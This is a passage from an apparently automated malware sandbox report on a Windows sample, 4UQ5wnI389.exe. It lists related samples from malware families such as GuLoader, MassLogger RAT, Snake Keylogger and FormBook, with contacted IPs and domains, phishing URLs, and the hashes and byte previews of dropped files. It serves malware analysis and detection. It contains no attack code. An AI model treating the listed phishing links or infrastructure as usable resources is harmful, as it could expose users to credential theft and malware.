                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.60
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  TimeTypeDescription
                                                                  15:25:32API Interceptor475x Sleep call for process: 4UQ5wnI389.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.220ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                      https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                        19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                              FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      104.21.112.19MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.buyspeechst.shop/qzi3/
                                                                                      QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                      • www.buyspeechst.shop/w98i/
                                                                                      wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                      • beammp.com/phpmyadmin/
                                                                                      158.101.44.242jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      checkip.dyndns.comajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 193.122.130.0
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 132.226.8.169
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      reallyfreegeoip.orgajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.32.1
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.80.1
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.64.1
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.32.1
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.96.1
                                                                                      api.telegram.orgajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TELEGRAMRUajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 149.154.167.220
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      ORACLE-BMC-31898USajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 193.122.130.0
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 193.122.6.168
                                                                                      jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 158.101.44.242
                                                                                      fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      CLOUDFLARENETUShttp://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 188.114.96.3
                                                                                      ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.48.1
                                                                                      FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                      • 104.16.184.241
                                                                                      http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.17.25.14
                                                                                      hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      348426869538810128.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                      • 162.159.61.3
                                                                                      statement.docGet hashmaliciousKnowBe4Browse
                                                                                      • 104.17.245.203
                                                                                      http://url4619.blast.fresha.com/ls/click?upn=u001.G0bnNiVD8tDhPRdNyxjhDe6AC2ZUylxwA-2FPGy7qPBOFCUALhhiYANslkdkKDsOuTa2ZqT7n3N6bFcUrsV3ma3w-3D-3DiLPp_ykKDCurTiMzdScmvRsWtgHw-2Bx-2FsD8gtjZ2QYvaL9rQITVCU8DqQaupyP3UmfqTkykrcOULUqJB8vo6EwGC-2FXTrZZmpb9VysDXh-2Bs9eImE1UjAPhR388ASwoK2AP8BEYSRfU-2BeoIKBzUjhDstghksAsPKSpvEGafa0WwVUEqkryumMEQR7LzeuVihS6omMjDxWLWVMpRaOOynXHENqj69QJe59g4iFPytRm60mTk5xjXMgeEaRzFxoPJ4ml3mi0VzHAqUdjS3jfMBnOzPxHyb77YZzptZnuj5FOqVfelcRKxyeSqvYRwMU4ICLhbfcggUpY9RSJQ7f8uHQHGk5X2Upw-3D-3DGet hashmaliciousUnknownBrowse
                                                                                      • 104.17.245.203
                                                                                      https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 172.67.74.152
                                                                                      https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                      • 188.114.96.3
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      54328bd36c14bd82ddaa0c04b25ed9adajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.112.1
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 104.21.112.1
                                                                                      3b5074b1b5d032e5620f69f9f700ff0eajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      http://diebinjmajbkhhg.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      37f463bf4616ecd445d4a1937da06e19ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.186.78
                                                                                      • 216.58.206.33
                                                                                      https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                      • 142.250.186.78
                                                                                      • 216.58.206.33
                                                                                      IpykYx5iwz.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 142.250.186.78
                                                                                      • 216.58.206.33
                                                                                      FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.186.78
                                                                                      • 216.58.206.33
                                                                                      ht58337iNC.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.186.78
                                                                                      • 216.58.206.33
                                                                                      ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.186.78
                                                                                      • 216.58.206.33
                                                                                      m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.186.78
                                                                                      • 216.58.206.33
                                                                                      fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 142.250.186.78
                                                                                      • 216.58.206.33
                                                                                      r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 142.250.186.78
                                                                                      • 216.58.206.33
                                                                                      RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • 142.250.186.78
                                                                                      • 216.58.206.33
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp\System.dllajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                                          DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousUnknownBrowse
                                                                                            KO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                  Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                    Pralevia Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                      NativeApp_G5L1NHZZ.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        Awb 4586109146.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                          Process:C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):484658
                                                                                                          Entropy (8bit):7.809711763657168
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
                                                                                                          MD5:5C727AE28F0DECF497FBB092BAE01B4E
                                                                                                          SHA1:AADE364AE8C2C91C6F59F85711B53078FB0763B7
                                                                                                          SHA-256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
                                                                                                          SHA-512:5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"
                                                                                                          Process:C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):263905
                                                                                                          Entropy (8bit):7.804338822214614
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:+1dPzivkruZ4jppvyBohPP2eZHuy+5H0OMyfRmsnoBAXe3VnYyHeCYo6P/+:LA3+B0OFO+O3yCYo6e
                                                                                                          MD5:2B84547146C33EACE918454BBB321D1E
                                                                                                          SHA1:F3E386DD5507B4D4217430616C67C6C7210C45D8
                                                                                                          SHA-256:D2CBB5A4E949819D3D6F1959AAFE1690993CFD926EE2E57C0E632D9BBE0039C3
                                                                                                          SHA-512:3BAEA26BF26A41A20F822A28A0FD6F784499EFD6FEDE45C426046C8C43CF8C5603351DF866F3AFA0798F1DF998229C88FA342637421D40E217BB15A8DD72265D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:...............>>>>>>.666...................................................K.......................}.......................z........~.....99......]........=..........DDDDDD...........f.................oo.................TTT......J......................V.p.f.....U....YY........................&...>...zzz. .....).i.........X..y.....JJ...............{..._............................Q..Z.............8..........111...l..........M.............}}...............U...OO.....................;;.........ff..]]]]]......^^.......................C......................\.............UU.*...AA.........................22................................0.................<....e.........)...W.77.../......................................u.?..uu......\\....................^^......UU.}}...............%%%%%%.....................Y..........s...........I..p......VVVVVVVV..................cc......TTT.}}}}..M..............................a.L............V..............s...55...........................??.e..........
                                                                                                          Process:C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):112291
                                                                                                          Entropy (8bit):1.249420131631438
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
                                                                                                          MD5:4D1D72CFC5940B09DFBD7B65916F532E
                                                                                                          SHA1:30A45798B534842002B103A36A3B907063F8A96C
                                                                                                          SHA-256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
                                                                                                          SHA-512:048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:..........P............+......................................................................................................................X......n..(................G...................................m.........|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................
                                                                                                          Process:C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):362089
                                                                                                          Entropy (8bit):1.23992084267325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                                                                          MD5:A4340182CDDD2EC1F1480360218343F9
                                                                                                          SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                                                                          SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
                                                                                                          SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............
                                                                                                          Process:C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):78506
                                                                                                          Entropy (8bit):4.627866955287932
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:Jo2l2OoxXvyZR1CFGSp769MkepEHgYM23zF5Z:J7M/y/1K7x69cYF3zFH
                                                                                                          MD5:9414AC12239022414DCE454B2F9DA8A1
                                                                                                          SHA1:D2741280D6FCF98342864F050A70DB911A3258A3
                                                                                                          SHA-256:4A977072857D8FCFDBE8ABFF9BE46A3809544B21848EF7106DACDB1624F7D23C
                                                                                                          SHA-512:6A7A88491782D8AA12FBE6D70267AE06727A956DB4EEC457A8394083E42938B670862A8C985D4C848AD2C9A57AA8994C8D6C1ADAC935315CCD8FE01E85C679E5
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:...................................uuu...........QQQ...>>.88..MM.ee.........ccc..........||............00..ddd...'..@.......J.......GGGGGG..~...}}}}...YY..........DDD....................3..ffff..f..............x.t......................................CCCCCC....................................J.................'....;.........y.......................c.........E......................++.66...N.......XX...............ccc........... ..............FF......k................'...........................33.}}.......77...............................................~.R..........rr.........................!........'..%%.7...5..,.<..yy..........................***.'......<......mm..............AAA....{{{................k....[[..............................................HHH..22222..........`````.A.++.PPP........<.....}............T.5.....p........^^^.1.....................................o.P..s...mmmm.VVV....K.................... .......'....bb..........==.b.....7777......qq....iiii.....Y.....@@@..
                                                                                                          Process:C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
                                                                                                          Category:dropped
                                                                                                          Size (bytes):139354
                                                                                                          Entropy (8bit):1.2473328695625903
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                                                                          MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                                                                          SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                                                                          SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                                                                          SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                                                                          Malicious:false
                                                                                                          Preview:.......................................|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........
                                                                                                          Process:C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1466952
                                                                                                          Entropy (8bit):5.449193204118006
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:sEo0OFO+IAoUo3xX3y4bz2lWwWo6rSTZyzq1o:L+IAoUoBXbz2luo6rS1yOa
                                                                                                          MD5:9A9CCC3CCCE3305D7BF0D4EA385269AD
                                                                                                          SHA1:40414B284951F2AE6FC28DE7685BC4EDEA5B8AA1
                                                                                                          SHA-256:486666369323B4030572089BABA690081877958623BE60CC383FE35A32BDFF9B
                                                                                                          SHA-512:5ABB2C3A5DE3E95B3C7E8A311B56429C6B34904AF052539EB3FD1CC3D3A51EE2A1298106E5BDF6B76A31C69AE92C2A4A66B673821684D8D7731D87713C0593C8
                                                                                                          Malicious:false
                                                                                                          Preview:.5......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...........w...h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12288
                                                                                                          Entropy (8bit):5.719859767584478
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                          MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                          SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                          SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                          SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: ajRZflJ2ch.exe, Detection: malicious, Browse
                                                                                                          • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                          • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                          • Filename: KO0q4biYfC.exe, Detection: malicious, Browse
                                                                                                          • Filename: Yoranis Setup.exe, Detection: malicious, Browse
